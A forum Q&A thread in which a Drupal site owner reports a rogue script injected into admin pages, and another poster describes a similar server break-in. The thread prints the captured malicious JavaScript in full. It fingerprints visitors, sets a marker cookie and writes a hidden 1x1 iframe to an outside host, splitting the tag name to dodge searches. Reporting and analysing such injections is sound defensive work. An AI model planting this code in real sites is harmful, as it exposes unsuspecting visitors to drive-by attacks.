Possible Duplicate:
Weird Script Appearing In My Website's DOM
I just noticed a weird script running in my website's DOM. I am running Drupal. The script is http://www.103fm.net/release.js. I don't know where to begin looking to find the source of this rogue script. My website is miloads.com, and it only happens in the admin menus. The weird thing is that the file doesn't exist on 103fm.net, but it actually loads the following script:
/**
 * Browser/OS fingerprinting helper from the injected script (kept verbatim as captured).
 *
 * After init() runs, the object exposes three properties:
 *   browser - identity of the first matching dataBrowser entry, else "An unknown browser"
 *   version - number parsed from the user agent / appVersion, else "an unknown version"
 *   OS      - identity of the first matching dataOS entry, else "an unknown OS"
 *
 * The tables below list only Firefox, MSIE and "Win", so every other browser or
 * platform falls through to the "unknown" strings.
 */
var BrowserDetect = {
// Populate browser, version and OS. The order matters: searchString() sets
// this.versionSearchString as a side effect, and searchVersion() reads it, so the
// version lookup has to run after the browser lookup and before the OS lookup.
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
// Walk a detection table and return the identity of the first entry that matches.
// An entry matches when its `string` contains `subString`, or, if it has no `string`,
// when its `prop` is truthy. Returns undefined when nothing matches.
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
// Overwritten on every iteration, so after a miss it holds the last entry's token.
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
// Find this.versionSearchString in dataString and parse the number that follows it.
// The "+ 1" skips one character after the token (presumably the "/" or " " separator).
// Returns undefined when the token is absent; parseFloat yields NaN for non-numeric
// text, which is falsy, so init() then falls back to its next alternative.
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
// Browser table: only Firefox and Internet Explorer ("MSIE") are recognised.
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
// OS table: only platforms whose navigator.platform contains "Win" are recognised.
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
/**
 * Set a cookie on the current document that expires after a number of days.
 *
 * @param {string} szName - cookie name
 * @param {string} szValue - cookie value; written as-is, with no encoding applied
 * @param {number} dtDaysExpires - lifetime in days from now
 *
 * Only `expires` is set; no path, domain or other attribute is written.
 */
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
// days -> milliseconds
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
// toGMTString() is the legacy name for toUTCString()
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
/**
 * Look up a cookie value by scanning document.cookie one character at a time.
 *
 * @param {string} szName - cookie name to search for
 * @returns {string} the text between the character after the first occurrence of
 *   szName and the next ";" (or the end of the cookie string); "" when not found
 *
 * The comparison is a plain substring match at every offset: it does not check that
 * the match starts at a cookie boundary or is followed by "=", so a name occurring
 * inside another cookie's name or value also matches.
 */
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
// Skip one character after the name (the "=" in a well-formed cookie).
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
// indexOf returned -1: this is the last cookie, so the value runs to the end.
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
// Unreachable: the return above already leaves the function.
break;
}
i++;
}
return "";
}
// Payload of the injected script: fingerprint the visitor, then decide whether to
// load the hidden iframe.
BrowserDetect.init();
// Not read again in the visible listing.
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
// Gate: only Firefox or Internet Explorer on Windows, and only when the marker cookie
// geo_id2=753445 is not already present.
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) {
// Marker cookie with a one-day lifetime, so a given browser gets the iframe at most
// once per day. That makes the behaviour hard to reproduce on a second page load;
// clear the cookie before re-testing an affected page.
addCookie("geo_id2", "753445", 1);
// Writes a 1x1, borderless, non-scrolling iframe that requests stat.cgi from a
// third-party host. The tag name is split as "<if" + "rame", presumably so that a
// plain-text search for the tag name does not match the script source (assumption;
// the page does not say).
// Indicators visible in this listing: the geo_id2=753445 cookie in a visitor's
// browser, and requests to the hosts named on this page in proxy or DNS logs.
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}
Similarly, our client's server was compromised last night from IP addresses in Romania, the Czech Republic and Poland. These seemingly automated processes appear to inject a script tag at the top of the body tag. This script appears to set a cookie on Windows machines running Firefox and IE. It then opens an iframe that requests a CGI script on a site hosted in Russia.
Fortunately, the latest version of Firefox won't even load the script; IE however does.
Chrome (despite not being affected) won't even allow you to visit the page on which this has happened.
As all the reports I can find of this are recent, it could very well be a software vulnerability rather than compromised passwords. What FTP server are you running? (Connect to the server with your FTP client, and the console should tell you.) The server in question is running ProFTPd 1.3.1.
If the software is common, then the creators should be informed.